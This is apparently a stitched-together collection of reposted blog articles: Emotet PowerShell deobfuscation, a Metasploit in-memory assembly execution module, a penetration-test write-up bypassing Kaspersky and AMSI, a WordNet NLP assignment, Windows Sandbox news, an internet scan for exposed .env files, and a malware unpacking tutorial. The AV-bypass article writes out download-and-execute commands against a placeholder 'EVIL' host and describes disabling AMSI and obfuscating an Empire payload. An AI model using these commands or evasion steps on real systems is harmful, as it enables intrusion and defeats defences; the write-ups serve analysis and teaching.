Of course you can deobfuscate it manually in any text editor, just by replacing every string with its equivalent or you can speed up a process with correct regular expression. In the end you can put this regular expression in the python script and automate it completely. There are just few things to consider when implementing it in python:

  • String concatenations. These little ‘+’ can mess up with our regexp, so they have to be handled first
  • Char type projection – sometimes for additional obfuscation, strings to be replaced are not typed directly to the powershell code, but they are converted from int to char. We have to handle that as well
  • Replacing one part of the code can “generate” new replace operators – this is because “junk string” can be in the middle of replace operator (for example: -replFgJace, where FgJ is a string to be replaced with empty string). For this reason it is best to put regexp in the loop and perform replace operation as long as there is something to replace
Deobfuscated code from example 1

2. String compression

This method is quite simple as it uses powershell’s built-in class DeflateStream to decompress and execute a compressed stream.

Example 2. Decompress string obfuscation method

The easiest way to deobfuscate this is to use powershell to simply decompress the string. Just remember to remove command between first two parenthesis – its a an obfuscated Invoke-Expression cmdlet that will execute the code on your computer! Also, always use a safe (possibly disconnected from the network, unless you know what you are doing), virtualized environment when dealing with malicious code.

Decompression method deobfuscation in powershell

But what if we’d like to have a portable python script that can deal with this type of deobfuscation? If we look at MSDN documentation, then we will see that DeflateStream class follows RFC 1951 Deflate data format specification, and can actually be decompressed by using zlib library. There is one catch: zlib’s decompress method by default expects correct zlib file header, which DeflateStream does not have, as it is not a file but a stream. To force zlib to decompress a stream we can either add a header to it or simply pass a -zlib.MAX_WBITS (there is a minus at the beginning!) argument to decompress function. zlib.MAX_WBITS (which is 15) argument with a negative value informs decompress function that it should skip header bits.

3. ASCII codes array

How does the computer represents strings? Well that is simple, as numbers. But numbers are much harder to read for human than strings, so these numbers are later changed to strings by every program. But if obfuscation’s goal is to make code harder to read, then why don’t use this trick to hide a true purpose of malicious code? This is the third obfuscation method I will present.

Example 3. Ascii code array obfuscation method

On the example above we can see a long string, with a lot of numbers in it. If you are familiar with ASCII codes, you will probable recognize them instantly. If not then your hint should be a type projection after a pipe that converts every given string from table first to int then to char. Method presented in example 3, also uses a split operator, that splits a string by a given separator to further obfuscate the code. I saw samples where a pure char array is used instead of a string that had to be split.

To deobfuscate this in python simply use similar split method (found in re library), and then map numbers to chars by using chr() function.

Ascii array with split method deobfuscation in python

A little more about the code

So now we deobfuscated the code, what we can gain from it? We can clearly see that this is a simple dropper, that uses WebClient class to connect to hardcoded domains, download a binary to %TEMP% directory and then launch it. The break instruction combined with try-catch clause assures that this script will connect to the domains provided until a download operation is completed successfully. So if it gets a binary from the first domain on the list, we will never see others in dynamic analysis. This is why deobfuscation is important.


Many obfuscated  powershell scripts (not only from Emotet) are using Invoke-Expression cmdlet to run an obfuscated string as a code. This is very important when we are working with powershell malicious code in the windows console, because missed invoke-expression cmdlet will launch a code instead of just displaying it. Therefore it is always important to look for disguised Invoke-Expression cmdlets. Why disguised? Because they are not always easy to spot. Firstly, powershell allows for usage of aliases for long commands. So for example built-in alias for Invoke-Expression is “iex”. But this is not the end! Powershell also allows to concatenate strings and use them as cmdlets, and strings can be stored in variables. You see the problem?

Let’s return to example with DeflateString compression. there is a following line at the beginning of the script:


It takes a value of a powershell’s built-in variable $verbosepreference, converts it to string, takes 2nd and 4th char, concatenates it with ‘X’ and concatenates them all together to one string using join operator.

What is the default value of  $verbosepreference? It turns out it is ‘SilentlyContinue’. Second and forth chars of this string are, you guessed it, ‘i’ and ‘e’. When we concatenate them with ‘x’ we receive ‘iex’ – alias of Invoke-Expression cmdlet. Creepy? Kinda. this kind of tricks in powershell are very popular among malware developers.

Invoke-Expression obfuscation example

Homework: Can you spot an Invoke-Expression cmdlet in third example (ASCII table)?

Deobfuscation script for Emotet

I put my deobfuscation script for Emotet on GitHub. You can use it and modify it as you wish. For now it automatically detects and deobfuscates all obfuscation methods described in this post.


Execute assembly via Meterpreter session

( Original text by B4rtik )


Windows to run a PE file relies on reading the header. The PE header describes how it should be loaded in memory, which dependencies has and where is the entry point.
And what about .Net Assembly? The entry point is somewhere in the IL code. Direct execution of the assembly using the entry points in the intermediate code would cause an error.
This is because the intermediate code should not be executed first but the runtime will load the intermediate code and execute it.

Hosting CLR

In previous versions of Windows, execution is passed to an entry point where the boot code is located. The startup code, is a native code and uses an unmanaged CLR API to start the .NET runtime within the current process and launch the real program that is the IL code. This could be a good strategy to achieve the result. The final aim is: to run the assemply directly in memory, then the dll must have the assembly some where in memory, any command line parameters and a reference to the memory area that contains them.

Execute Assembly

So I need to create a post-exploitation module that performs the following steps:

  1. Spawn a process to host CLR (meterpreter)
  2. Reflectively Load HostCLR dll (meterpreter)
  3. Copy the assembly into the spawned process memory area (meterpreter)
  4. Copy the parameters into the spawned process memory area (meterpreter)
  5. Read assembly and parameters (dll)
  6. Execute the assembly (dll)

To start the Host process, metasploit provides Process.execute which has the following signature:

Process.execute (path, arguments = nil, opts = nil)

The interesting part is the ops parameter:

  1. Hidden
  2. Channelized
  3. Suspended
  4. InMemory

By setting Channelized to true, I can read the assembly output for free with the call


Once the Host process is created, Metasploit provides some functions for interacting with the memory of a remote process:

  1. inject_dll_into_process
  2. memory.allocate
  3. memory.write

The inject_dll_into_process function copies binary passed as an argument to a read-write-exec memory area and returns its address and an offset of the dll’s entry point.

exploit_mem, offset = inject_dll_into_process (process, library_path)

The memory.allocate function allocates memory by setting the required protection mode. In this case
I will write the parameters and the assembly in the allocated memory area, for none of these two elements I need the memory to be executable so I will set RW.

I decided to organize the memory area dedicated to parameters and assemblies as follows:

1024 bytes for the parameters
1M for the assembly

assembly_mem = process.memory.allocate (1025024, PAGE_READWRITE)

The third method allows to write data to a specified memory address.

process.memory.write (assembly_mem, params + File.read (exe_path))

Now I have the memory address of dll, the offset to the entry point, the memory address fo both the parameters and the assembly to be executed.
Considering the function

Thread.create (entry, parameter = nil, suspended = false)

I can use the memory address of dll plus the offset as a value for the entry parameter and the address the parameter and assembly memory area as the parameter parameter value.

process.thread.create (exploit_mem + offset, assembly_mem)

This results in a call to the entry point and an LPVOID pointer as input parameter.

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)

It’s all I need to recover the parameters to be passed to the assembly and the assembly itself.

ReadProcessMemory(GetCurrentProcess(), lpPayload, allData, RAW_ASSEMBLY_LENGTH + RAW_AGRS_LENGTH, &readed);

About the assemblies to be executed, it is important to note that the signature of the Main method must match with the parameters that have been set in the module, for example:

If the property ARGUMENTS is set to «antani sblinda destra» the main method should be «static void main (string [] args)»
If the property ARGUMENTS is set to «» the main method should be «static void main ()»

Chaining with SharpGen

A few days ago I read a blog post from @cobb_io where he presented an interesting tool for inline compilation of .net assemblies. By default execute-assembly module looks for assemblies in $(metasploit-framework-home)/data/execute-assembly but it is also possible to change this behavior by setting the property ASSEMBLYPATH for example by pointing it to the SharpGen Output folder in this way I can compile the assemblies and execute them directly with the module.

Source code


Bypassing Kaspersky Endpoint Security 11

( Original text by 0xc0ffee )


During a recent engagement, I was given a Windows tablet with no (pentest) tools installed and was asked to test its security and test how far I could go by compromising it. I had my own laptop but I was not allowed to directly connect to the internal network with it. However, I could use it as a C2 if I were to successfully compromise the tablet. Long story short, obtaining the initial shell was more difficult than owning the network due to the antivirus(es) that were required to bypass.


  1. Fully patched Windows 10 running on the tablet
  2. Up-to-date Kaspersky Endpoint Security 11 (KES11) on the tablet
  3. Google Chrome running a kiosk/PoS mode on the tablet
  4. Powershell Empire listener on the C2


So, I’m in Chrome’s kiosk/PoS mode on the tablet and every Windows shortcut is blocked such as WIN+R, ALT+TAB, CTRL+P, ALT+SPACE, etc. More on that here: Kiosk/POS Breakout Keys in Windows

However, the CTRL+N shortcut to open a new page was not blocked, bingo! We got a new page and Internet access, awesome. I went to the URL bar and quickly used the file:// scheme to download and open cmd.exe:

Instead of rushing straight into the terminal that just popped, I tried to open the Windows Explorer to have GUI access to files and shares by clicking Open file location on the downloaded file. Aaaaand, the action was denied, probably by a GPO.

Back to the terminal:

  1. I enumerated the files and shares and found nothing interesting.
  2. Ran wmic product get name, version to enumerate the installed softwares and associated versions.
  3. Ran wmic qfe get to list the hotfixes.
  4. Ran net user my_user /domain (yes, my_user was domain-joined to simulate an internal attack)
  5. Ran whoami /priv to list my privileges.

Got nothing very interesting exploit-wise that would give me a quick win. I was a domain-joined user with no administrative privileges and had many restrictive GPOs applied to the groups I belonged to. AV wise, Kaspersky Endpoint Security version was installed and so did Windows Defender.

Fail, fail, fail and succeed

One of my goals was to prove I could bypass the AV by injecting an Empire implant and moving on from there. As this test was not a red team and was time-constrained, I did not replicate the tablet’s environment to perform my tests. So, I started by downloading the Empire Powershell launcher through an encrypted channel with Powershell’s Invoke-Expression: IEX (New-Object Net.Webclient).downloadstring("https://EVIL/hello_there") and that would get detected, not by the AV, but by the firewall that was presumably performing SSL inspection! So, I needed a payload that could atleast get through the firewall before getting executed in memory. To spare you some time, I spent a full day failing over and over, getting either detected by the firewall or the AV, making the sysadmins very happy but also tired of getting alerts.

Compression and memory patching make a good pair

I knew Windows Defender was installed on the tablet and was leaving KES11 take control of most of the anti malware scanning. However, I learned the hard way that KES11 was making use of AMSI’s detection of script-based attacks. In fact, on their website, they mention the use of the AMSI technology, but only on the Kaspersky Security for Windows Serverpage:

Support for AMSI interfaces. Use of AMSI technology, which is integrated in Microsoft Windows, has enabled the improvement of the mechanism for intercepting script launches on the server. The stability of the Script Monitoring task is improved, the application’s influence on the environment is reduced when intercepting scripts and blocking them if threats are detected, and the task scope is significantly expanded – now the Script Monitoring component works not only with scripts in JS and VBS files, but also PS1 files. The functionality is available when the Script Monitoring component is installed on servers running Microsoft Windows Server 2016 or newer.

A colleague of mine recently shared an excellent blog post on how to bypass/disable the Anti Malware Scan Interface (AMSI) without elevated privileges by patching it in memory with a DLL : Bypass AMSI and Execute ANY malicious powershell code

With that in mind, we first need to bypass traffic inspection, remember? Invoke-Obfuscation comes to rescue. Compressing the Empire payload a few times was enough to get around it.

First, we grab the base64 part of our launcher.bat file generated by Empire, decode it and send it over to Invoke-Obfuscation. To do so, we run set SCRIPTBLOCK our_empire_base64decoded_payload:

Next, we run COMPRESS\1 a couple of times to compress our payload:

I then successfully downloaded the file to load it in memory with IEX. But now that the traffic inspection was bypassed, the AV was blocking the execution of the payload (no surprise).

What I learned during this gig was that KES11’s heuristics or signatured-based detections were first firing on my payload before AMSI even had a chance to inspect the script. I had to compress the payload exactly 4 times before it could bypass the AV and then get detected by AMSI:

All that’s left to do is disable AMSI and we’re good to go. I hosted the following code on a web server and downloaded it on the tablet with IEX:

function Bypass-AMSI
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        Write-Output "DLL has been reflected";

Source: Bypass AMSI and Execute ANY malicious powershell code

IEX (New-Object Net.Webclient).downloadstring("https://EVIL/amsi") then Bypass-AMSI.

Successful execution

Now that the payload is compressed 4 times and AMSI is disabled, we download the payload and execute it in memory:

IEX (New-Object Net.Webclient).downloadstring("https://EVIL/compressed4.txt")

In the screenshot above, we can see that compressing the payload up to 3 times gets detected by KES11. The 4th time, the payload gets through the AV and since AMSI is disabled, we get successful execution:


Natural Language Processing: Measuring Semantic Relatedness

( Original text by Sandipan )

Long title: Measuring Semantic Relatedness using the Distance and the Shortest Common Ancestor and Outcast Detection with Wordnet Digraph in Python

The following problem appeared as an assignment in the Algorithm Course (COS 226) at Princeton University taught by Prof. Sedgewick.  The description of the problem is taken from the assignment itself. However, in the assignment, the implementation is supposed to be in java, in this article a python implementation will be described instead. Instead of using nltk, this implementation is going to be from scratch.

The Problem

  • WordNet is a semantic lexicon for the English language that computational linguists and cognitive scientists use extensively. For example, WordNet was a key component in IBM’s Jeopardy-playing Watson computer system.
  • WordNet groups words into sets of synonyms called synsets. For example, { AND circuitAND gate } is a synset that represent a logical gate that fires only when all of its inputs fire.
  • WordNet also describes semantic relationships between synsets. One such relationship is the is-a relationship, which connects a hyponym (more specific synset) to a hypernym (more general synset). For example, the synset gatelogic gate } is a hypernym of { AND circuitAND gate } because an AND gate is a kind of logic gate.
  • The WordNet digraph. The first task is to build the WordNet digraph: each vertex v is an integer that represents a synset, and each directed edge v→w represents that w is a hypernym of v.
  • The WordNet digraph is a rooted DAG: it is acyclic and has one vertex—the root— that is an ancestor of every other vertex.
  • However, it is not necessarily a tree because a synset can have more than one hypernym. A small subgraph of the WordNet digraph appears below.

The WordNet input file formats

The following two data files will be used to create the WordNet digraph. The files are in comma-separated values (CSV) format: each line contains a sequence of fields, separated by commas.

  • List of synsets: The file synsets.txt contains all noun synsets in WordNet, one per line. Line i of the file (counting from 0) contains the information for synset i.
    • The first field is the synset id, which is always the integer i;
    • the second field is the synonym set (or synset); and
    • the third field is its dictionary definition (or gloss), which is not relevant to this assignment.For example, line 36 means that the synset { AND_circuitAND_gate } has an id number of 36 and its gloss is a circuit in a computer that fires only when all of its inputs fire. The individual nouns that constitute a synset are separated by spaces. If a noun contains more than one word, the underscore character connects the words (and not the space character).
  • List of hypernyms: The file hypernyms.txt contains the hypernym relationships. Line i of the file (counting from 0) contains the hypernyms of synset i.
    • The first field is the synset id, which is always the integer i;
    • subsequent fields are the id numbers of the synset’s hypernyms.For example, line 36 means that synset 36 (AND_circuit AND_Gate) has 42338 (gate logic_gate) as its only hypernym. Line 34 means that synset 34 (AIDS acquired_immune_deficiency_syndrome) has two hypernyms: 47569 (immunodeficiency) and 56099 (infectious_disease).

The WordNet data type 

Implement an immutable data type WordNet with the following API:

  • The Wordnet Digraph contains 76066 nodes and 84087 edges, it’s very difficult to visualize the entire graph at once, hence small subgraphs will be displayed as and when required relevant to the context of the examples later.
  • The sca() and the distance() between two nodes v and w are implemented using bfs (bread first search) starting from the two nodes separately and combining the distances computed.

Performance requirements 

  • The data type must use space linear in the input size (size of synsets and hypernyms files).
  • The constructor must take time linearithmic (or better) in the input size.
  • The method isNoun() must run in time logarithmic (or better) in the number of nouns.
  • The methods distance() and sca() must make exactly one call to the length() and ancestor() methods in ShortestCommonAncestor, respectively.

The Shortest Common Ancestor

  • An ancestral path between two vertices v and w in a rooted DAG is a directed pathfrom v to a common ancestor x, together with a directed path from w to the same ancestor x.
  • shortest ancestral path is an ancestral path of minimum total length.
  • We refer to the common ancestor in a shortest ancestral path as a shortest common ancestor.
  • Note that a shortest common ancestor always exists because the root is an ancestor of every vertex. Note also that an ancestral path is a path, but not a directed path.
  • The following animation shows how the shortest common ancestor node 1 for thenodes 3 and 10  for the following rooted DAG is foundat distance 4 with bfs, along with the ancestral path 3-1-5-9-10. 
  • We generalize the notion of shortest common ancestor to subsets of vertices. A shortest ancestral path of two subsets of vertices A and B is a shortest ancestral path over all pairs of vertices v and w, with v in A and w in B.
  • The figure (digraph25.txt) below shows an example in which, for two subsets, red and blue, we have computed several (but not all) ancestral paths, including the shortest one.
    Shortest common ancestor data type Implement an immutable data type ShortestCommonAncestor with the following API:

Basic performance requirements 

The data type must use space proportional to E + V, where E and V are the number of edges and vertices in the digraph, respectively. All methods and the constructor must take time proportional to EV (or better).

Measuring the semantic relatedness of two nouns

Semantic relatedness refers to the degree to which two concepts are related. Measuring semantic relatedness is a challenging problem. For example, let’s consider George W. Bushand John F. Kennedy (two U.S. presidents) to be more closely related than George W. Bush and chimpanzee (two primates). It might not be clear whether George W. Bush and Eric Arthur Blair are more related than two arbitrary people. However, both George W. Bush and Eric Arthur Blair (a.k.a. George Orwell) are famous communicators and, therefore, closely related.

Let’s define the semantic relatedness of two WordNet nouns x and y as follows:

  • A = set of synsets in which x appears
  • B = set of synsets in which y appears
  • distance(x, y) = length of shortest ancestral path of subsets A and B
  • sca(x, y) = a shortest common ancestor of subsets A and B

This is the notion of distance that we need to use to implement the distance() and sca() methods in the WordNet data type.


Finding semantic relatedness for some example nouns with the shortest common ancestor and the distance method implemented

apple and potato (distance 5 in the Wordnet Digraph, as shown below)


As can be seen, the noun entity is the root of the Wordnet DAG.

beer and diaper (distance 13 in the Wordnet Digraph)


beer and milk (distance 4 in the Wordnet Digraph, with SCA as drink synset), as expected since they are more semantically closer to each other.


bread and butter (distance 3 in the Wordnet Digraph, as shown below)


cancer and AIDS (distance 6 in the Wordnet Digraph, with SCA as disease as shown below, bfs computed distances and the target distance between the nouns are also shown)


car and vehicle (distance 2 in the Wordnet Digraph, with SCA as vehicle as shown below)


cat and dog (distance 4 in the Wordnet Digraph, with SCA as carnivore as shown below)


cat and milk (distance 7 in the Wordnet Digraph, with SCA as substance as shown below, here cat is identified as Arabian tea)


Einstein and Newton (distance 2 in the Wordnet Digraph, with SCA as physicist as shown below)


Leibnitz and Newton (distance 2 in the Wordnet Digraph, with SCA as mathematician)


Gandhi and Mandela (distance 2 in the Wordnet Digraph, with SCA as national_leader synset)


laptop and internet (distance 11 in the Wordnet Digraph, with SCA as instrumentation synset)

school and office (distance 5 in the Wordnet Digraph, with SCA as construction synset as shown below)


bed and table (distance 3 in the Wordnet Digraph, with SCA as furniture synset as shown below)

Tagore and Einstein (distance 4 in the Wordnet Digraph, with SCA as intellectual synset as shown below)


Tagore and Gandhi (distance 8 in the Wordnet Digraph, with SCA as person synset as shown below)


Tagore and Shelley (distance 2 in the Wordnet Digraph, with SCA as author as shown below)


text and mining (distance 12 in the Wordnet Digraph, with SCA as abstraction synset as shown below)


milk and water (distance 3 in the Wordnet Digraph, with SCA as food,as shown below)

Outcast detection

Given a list of WordNet nouns x1, x2, …, xn, which noun is the least related to the others? To identify an outcast, compute the sum of the distances between each noun and every other one:

di   =   distance(xix1)   +   distance(xix2)   +   …   +   distance(xixn)

and return a noun xt for which dt is maximum. Note that distance(xixi) = 0, so it will not contribute to the sum.

Implement an immutable data type Outcast with the following API:




As expected, potato is the outcast  in the list of the nouns shown below (a noun with maximum distance from the rest of the nouns, all of which except potato are fruits, but potato is not). It can be seen from the Wordnet Distance heatmap from the next plot, as well as the sum of distance plot from the plot following the next one.

Again, as expected, table is the outcast  in the list of the nouns shown below (a noun with maximum distance from the rest of the nouns, all of which except table are mammals, but table is not). It can be seen from the Wordnet Distance heatmap from the next plot, as well as the sum of distance plot from the plot following the next one.


Finally, as expected, bed is the outcast  in the list of the nouns shown below (a noun with maximum distance from the rest of the nouns, all of which except bed are drinks, but bed is not). It can be seen from the Wordnet Distance heatmap from the next plot, as well as the sum of distance plot from the plot following the next one.


Microsoft unveils Windows Sandbox: Run any app in a disposable virtual machine

( Original text by PETER BRIGHT )

A few months ago, Microsoft let slip a forthcoming Windows 10 feature that was, at the time, called InPrivate Desktop: a lightweight virtual machine for running untrusted applications in an isolated environment. That feature has now been officially announced with a new name, Windows Sandbox.

Windows 10 already uses virtual machines to increase isolation between certain components and protect the operating system. These VMs have been used in a few different ways. Since its initial release, for example, suitably configured systems have used a small virtual machine running alongside the main operating system to host portions of LSASS. LSASS is a critical Windows subsystem that, among other things, knows various secrets, such as password hashes, encryption keys, and Kerberos tickets. Here, the VM is used to protect LSASS from hacking tools such that even if the base operating system is compromised, these critical secrets might be kept safe.Ars Technica

In the other direction, Microsoft added the ability to run Edge tabs within a virtual machine to reduce the risk of compromise when visiting a hostile website. The goal here is the opposite of the LSASS virtual machine—it’s designed to stop anything nasty from breaking out of the virtual machine and contaminating the main operating system, rather than preventing an already contaminated main operating system from breaking into the virtual machine.

Windows Sandbox is similar to the Edge virtual machine but designed for arbitrary applications. Running software in a virtual machine and then integrating that software into the main operating system is not new—VMware has done this on Windows for two decades now—but Windows Sandbox is using a number of techniques to reduce the overhead of the virtual machine while also maximizing the performance of software running within the VM, without compromising the isolation it offers.

The sandbox depends on operating system files residing in the host.
Enlarge / The sandbox depends on operating system files residing in the host.Microsoft

Traditional virtual machines have their own operating system installation stored on a virtual disk image, and that operating system must be updated and maintained separately from the host operating system. The disk image used by Windows Sandbox, by contrast, shares the majority of its files with the host operating system; it contains a small amount of mutable data, the rest being immutable references to host OS files. This means that it’s always running the same version of Windows as the host and that, as the host is updated and patched, the sandbox OS is likewise updated and patched.

Sharing is used for memory, too; operating system executables and libraries loaded within the VM use the same physical memory as those same executables and libraries loaded into the host OS.

That sharing of the host's operating system files even occurs when the files are loaded into memory.
Enlarge / That sharing of the host’s operating system files even occurs when the files are loaded into memory.Microsoft

Standard virtual machines running a complete operating system include their own process scheduler that carves up processor time between all the running threads and processes. For regular VMs, this scheduler is opaque; the host just knows that the guest OS is running, and it has no insight into the processors and threads within that guest. The sandbox virtual machine is different; its processes and threads are directly exposed to the host OS’ scheduler, and they are scheduled just like any other threads on the machine. This means that if the sandbox has a low priority thread, it can be displaced by a higher priority thread from the host. The result is that the host is generally more responsive, and the sandbox behaves like a regular application, not a black-box virtual machine.

On top of this, video cards with WDDM 2.5 drivers can offer hardware-accelerated graphics to software running within the sandbox. With older drivers, the sandbox will run with the kind of software-emulated graphics that are typical of virtual machines.

Taken together, Windows Sandbox combines elements of virtual machines and containers. The security boundary between the sandbox and the host operating system is a hardware-enforced boundary, as is the case with virtual machines, and the sandbox has virtualized hardware much like a VM. At the same time, other aspects—such as sharing executables both on-disk and in-memory with the host as well as running an identical operating system version as the host—use technology from Windows Containers.

At least for now, the Sandbox appears to be entirely ephemeral. It gets destroyed and reset whenever it’s closed, so no changes can persist between runs. The Edge virtual machines worked similarly in their first incarnation; in subsequent releases, Microsoft added support for transferring files from the virtual machine to the host so that they could be stored persistently. We’d expect a similar kind of evolution for the Sandbox.

Windows Sandbox will be available in Insider builds of Windows 10 Pro and Enterprise starting with build 18305. At the time of writing, that build hasn’t shipped to insiders, but we expect it to be coming soon.

Publicly accessible .ENV files

( Original text by BinaryEdge )

Deployment is something a lot of companies still struggle with. We talked about the issue with Kubernetes being deployed insecurely a few weeks ago in a blogpost and how the kubernetes pods are being hijacked to mine for cryptocurrency.

This week we look at something different but still related to deployments and exposing things to public that should not be.

One tweet from @svblxyz (whom we would also like to thank for all the help given to us on reviewing this post and giving tips on things to add) showed us an interesting google dork which made us wonder, what does this look like for IP adresses vs domain/services focused (as google search is).View image on Twitter

View image on Twitter



Don’t put your .env files in the web-server directory https://www.google.com/search?q=db_password+filetype%3Aenv …2,7829:15 PM — Sep 26, 20181,950 people are talking about thisTwitter Ads info and privacy

So we launched a scan using our distributed platform, as simple as:

> curl https://api.binaryedge.io/v1/tasks -d '{
      "description": "HTTP Worldscan .env",
      "type": "scan",
      "options": [{
        "targets": ["XXXX"],
        "ports": [{
            "modules": ["http"],
            "port": "80",
            "config": { "http_path": "/.env" }
      }' -H 'X-Token:XXXXXX'

After this we started getting the results and of course multiple issues can be identified on these scans:

  • Bad Deployments — The .ENV files being accessible is something that shouldn’t happen — there are companies exposing this type of file fully readable with no authentication.
  • Weak credentials — Lots of services with a username/password combo using weak passwords.

Credentials and Tokens

Lots different types of Service Tokens were found:

  • AWS — 38 tokens
  • Mangopay — 9 tokens
  • Stripe — 89 tokens
  • Pusher — 1600 Tokens

Other tokens found include:

  • PlugandPlay
  • Paypal
  • Mailchimp
  • Facebook
  • PhantomJS
  • Mailgun
  • Twitter
  • JWT
  • Google
  • WeChat
  • Shopify
  • Nexmo.
  • Bitly
  • Braintree
  • Twilio
  • Recaptcha
  • Ucloud
  • Firebase
  • Mandrill
  • Slack
  • Sentry.io
  • Shopzcoin

Many of these systems involve financial records/ payments.

But we also found access configurations to Databases, which potentially contain customer data, such as:

  • DB_PASSWORD keys: 1161
  • REDIS_PASSWORD keys: 801
  • MySQL credentials: 946 (username/password combos).

Looking at the passwords being used the top 3 we see they all consist of weak passwords:

1 — secret — 93
2 — root — 33
3 — adminadmin — 24

Other weak passwords found are:

  • password
  • test123
  • foobar

When exposed tokens go super bad…


Something that is also very dangerous is situations like the CVE-2018-15133 where if the APP_KEY is leaked for the Laravel app, allows an attacker to execute commands on the machine where the Laravel instance is running.

And our scan found: 300 APP_KEY Tokens related to Laravel.

One important note to be taken into account, we looked only at port 80 internet wide for our scan. The exposure on this can easily be much higher as other web apps will surely be exposing more .env files!

Unpacking Grey Energy malware (Service Application DLL)

( Original text by D3xt3r )

Recently I stumbled upon malware sample which was part of Grey Energy malware campaign targeting Ukraine energy infrastructure. I ran the hash of the file on virutotal and many of the antiviruses tagged it Grey Energy and I tried to do a little more internet research but didn’t find and analysis on it. As there was no post on this sample so I decided to write one.
In the post you will learn the following:

  1. How to debug Windows Service Application DLL
  2. Learn how to use a EBFE debugging technique
  3. Unpacking a DLL binary
  4. How to dump an unpacked in-memory executable

Identifying the Malware

Using some basic static analysis tool you can know that it’s a 64-bit Windows DLL.

Since it’s a DLL there we need to see the export table. There was only one function that was exported which is ServiceMain. This is the method is usually exported by Windows Service Application DLL. This is the function which is invoked when a request is made to the Windows Service Application.

Checking the Import section you can see the below DLL been imported. But as we see the further analysis, not all the DLL which are imported are in use.

Brief Introduction To Windows Service Application

If you know already know about Windows Services then I would advise you to skip this section. I will describe all the necessary stuff about Windows Service from malware authors perspective, but if you are interested to know more about it then you can refer to links in the reference section at the end of this post.

What is a Windows Service?

Windows Service Application is to create long-running background application which you can start automatically when the system boot/reboot and it doesn’t have any user interface. Services can be put in the various state like start, stop, paused, resume and restarted, all this is managed by Windows Service Controller(services.exe). These features make it ideal for use as malware which does all its working in the background and its also long running starts on reboot. Actual use cases of Services are like Web Server service, logging machine performance metric like CPU, RAM etc. Service executable can be a DLL program with a defined entry point.

A service may be written to run as either a stand-alone process or as a part of the Service Control Manager’s(svchost.exe) process (which creates a thread per service, and the service is allowed to create more threads). If the service runs in SC, the SC creates the thread for a service then loads its DLL, and calls the Service entry points to move the service through its states (first start, then eventually stop). Since creating a thread from the svchost.exe process(a system service) giving it system privileges which can be dangerous, but you can run the DLL in the specific security context of the user account that can be different from logged-on user.

Service Application requires the following items:

To create a Service DLL you need to satisfy specific requirement which is as follows :

  1. Main Entry point: this is required to register your service by calling StartServiceCtrlDispatcherthis will be the DLL entry point.
  2. Service Entry point: which is ServiceMain in the DLL export entry, task to this function is as following tasks:
    1. Initialize any necessary items which we deferred from the DLL Entry Point.
      Register the service control handler which will handle Service Stop, Pause, Continue, Shutdown, etc control commands.
    2. Set Service Status to SERVICE_PENDING than to SERVICE_RUNNING. Set status to SERVICE_STOPPED on any errors and on exit.
    3. Perform startup tasks. Like creating threads/events/mutex/IPCs/etc.
  3. Service Control Handler: The Service Control Handler was registered in your ServiceMain Entry point. Each service must have a handler to handle control requests from the SCM. This handler will be called in the context of the SCM and will hold the SCM until it returns from the handler. Service Handler is called on various events like start, stop, paused etc which is passed as the parameter to the handler function.

Basic Static Analysis

We start with doing static analysis on the DllEntry point this might be the first function which might get executed even before ServiceMain. Below is the disassembly of the DllEntry point.

Looking at the disassembly further there was some memory allocation and manipulating of that memory. There was another interesting function which is found was at address 0x2c0202bc, this function was called after allocation of memory which seems to be like a decryptor function, or at least preparing for so decryption. Below is the disassembly of this function.

As there are a couple of XOR operations whose value is picked from register rsp+0x68 and after some manipulation data is written to [rbx+rsi*2] translate to the same address. We can verify this in dynamic analysis. I am at this point little suspicious that the executable is packed as not many functions were recognized by both IDA and radare2 analysis.

Let us have look at the disassembly of the ServiceMain.

These instruction doesn’t seem to make any sense. This further confirms our doubt of packed executable. We can use radare2 entropy calculation function to check the entropy if each segment in the execute. If there is any segment with high entropy then it means that section holds the encrypted data. We can use radare2 iS entropy command to calculate the entropy of each segment, below is the result of the command.

As you can clearly see that .text segment has very high entropy compared to other segments. This confirms our suspicious of packed executable. In the next sections, we will try to setups debugging environment for Service Application as it is not as straight forward as other windows application and extract the unpacked executable using dynamic analysis.

How to debug a Service Application DLL

If this would have been a normal DLL we could just used Immunity debugger to do debugging but Service Application DLL is different as they have to register themselves and declare their state as running within first few seconds of execution, and also before running the main entry point the Service Control Manager(SCM) should be aware that the Service is going to run and the DLL runs only in the context of the SCM.

So the challenge is that we cannot get hold of the DLL entry point with ad debugger. We could overcome this limitation if we could manage to pause the execution of the DLL entry point when the SCM run the DLL.

After doing some research I came across a technique called EBFE, you can read more about on this link. In this technique, we insert an infinite loop at the point we want to insert the breakpoint, once the thread executes this instruction it puts it in an infinite loop. EBFE is a jump instruction code which points to itself, this will put the executing thread in an infinite loop and then we all the time in the world to attach the debugger to the process and start debugging the process.

Next question is how will we know which subprocess spawned by SCM should we attach the debugger to? It’s actually very simple, once the CPU executes the infinite loop instruction the CPU consumption value will rise to very high-value something like 90-100%. We can use process explorer one of the System Internal tools to get the process ID of the process.

As you can see in the image above once the CPU executes EBFE instruction it goes in an infinite loop which increases the CPU consumption to 95-100% which is the indicator that our process is ready to be attached.

Now that we have figured out how to attach the debugger to _Service Application _, next thing is we have to place this instruction at a point which will get executed which is the entry point of the DLL. There are two points of interest at which we are can place EBFE are, ServiceMain(Service entry point) and DllEntry (DLL entry point). We will place this EBFE instruction on both of these functions. Before replacing the two-byte instruction you will have to take note of the original two bytes which you are replacing. Once the hit the infinite loop we will replace it with the original bytes and continue debugging.

Dynamically unpacking the packed code

Let us start with analyzing DllEntry point since out of those two functions only this function had some sensible code.

First, the memory is allocated for the size of the original executable, the way it allocates the memory is something weird, it specifies the base address of memory block it wants to allocate, if it fails then it iterates from 100000h at the interval of 10000h tries to allocate the memory. We will have to not down this address as the unpacked executable will be on this address.

then it changes the memory permission of the allocated memory and copies each segment (.text, .rdata, ) to newly allocated memory.

then it patches the current DLL entry point with the DllEntry point function in unpacked code. Before patching the memory address it changes the memory permission to writable then restore it back to Read and Execute.

It then iterates the Import Address Table(IAT) of the unpacked DLL and it loads the DLL present in the IAT and resolves the imported functions and patches it in the table.

this is the stage at with code is unpacked and the IAT is resolved next the code jump to the original DllEntry point for execution.

Dumping the unpacked code

The memory address which we noted earlier in the address at which the executable is unpacked as you can see in the dump below.

We will use Scylla plugin which built-in in X64-dbg to dump the executable. You will have to specify the base address of the executable and the size of memory you want to use to recover the PE which you can see from the memory panel next to the address column and size of the debugger which is 23000 in our case and click the dump PE to save the executable file.

Unpacked Binary

Unpacked binary basic information is as shown below

